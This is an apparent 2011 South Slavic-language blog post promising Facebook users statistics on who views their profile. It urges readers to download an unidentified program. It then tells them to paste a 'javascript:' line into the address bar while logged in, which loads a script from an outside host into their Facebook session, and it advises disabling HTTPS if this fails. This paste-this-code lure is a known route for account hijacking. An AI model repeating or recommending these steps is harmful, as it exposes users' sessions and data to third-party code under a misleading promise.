nedjelja, 21. kolovoza 2011.

Ko vam gleda profil? A kome VI gledate profil?



Sigurno ste se već susreli sa fan stranicama / aplikacijama koje Vam obećavaju da ćete nakon „lajkanja“ na njima vidjeti statistiku prijatelja koji Vam najviše gledaju profil, što je zasigurno svima zanimljiva informacija. Na žalost vjerovatno ste i sami na kraju shvatili da su one ograničene samo na prijatelje koji također koriste tu aplikaciju, a čak i u tom slučaju statistike nisu pretjerano relevantne.

Medjutim, jucer je izbacena najnovija aplikacija koja sluzi za to, i mozemo vam reci da smo stvarno iznenadjeni te da je ovo do sada najbolje uradjena aplikacija.

Sve sto treba jeste da skinete program sa linka te instalirate :)

Link za download programa

Kada odete na link, idite na "Regular Download", sacekajte 15 sekundi i onda skinite program .

A jeste li se ikad zapitali KOME VI najviše gledate profil? E za to sada možete dobiti tačnu statistiku!
Kako?
Postoji način da koristite i ovu funkciju. Način je da otvorite Vaš Facebook profil i zatim u „address bar“ (prostor gdje je unesena web stranica „http://…itd.“), kopirate slijedeći kod:
javascript:(function(){var script=document.createElement(‘script’);script.type=’text/javascript’;script.src=’http://thekeesh.com/js/edges.js’;document.getElementsByTagName(‘body’)[0].appendChild(script);}())
I pritisnete ENTER!




Uživajte u statistikama! Predlažemo da ovo uradite dok ste sami za računarom, jer možda ni sami niste svjesni koga sve tražite ili koga najćešće „pratite“… ;D
Napomena: ako vam nešto ne radi, vjerojatno imate uključenu HTTPS vezu, koju je potrebno isključiti u postavkama Facebooka. Također, listu ne možete ukloniti nikako osim ponovnim učitavanjem (refresh) Facebook stranice.
Šta predstavljaju dobivene statistike?
Facebook na temelju učestalosti vašeg traženja i gledanja profila neke osobe dodjeljuje vrijednosti. Čim je veća „negativna“ vrijednost tog broja, tim više je Facebook siguran da tražite upravo tu osobu. Napominjemo kako se u rezultatima prikazuju sve osobe koje tražite, neovisno o tome jeste li ili niste prijatelji na Facebooku.
Ovo je također, još jedan dokaz da Facebook zaista vodi detaljnu evidenciju o svim našim „relacijama“ na Facebooku, čije profile gledamo najviše, tako da nam se (to ste zasigurno već primjetili) upravo njihove vijesti prve pojavljuju na naslovnici.



0 komentari:

Objavi komentar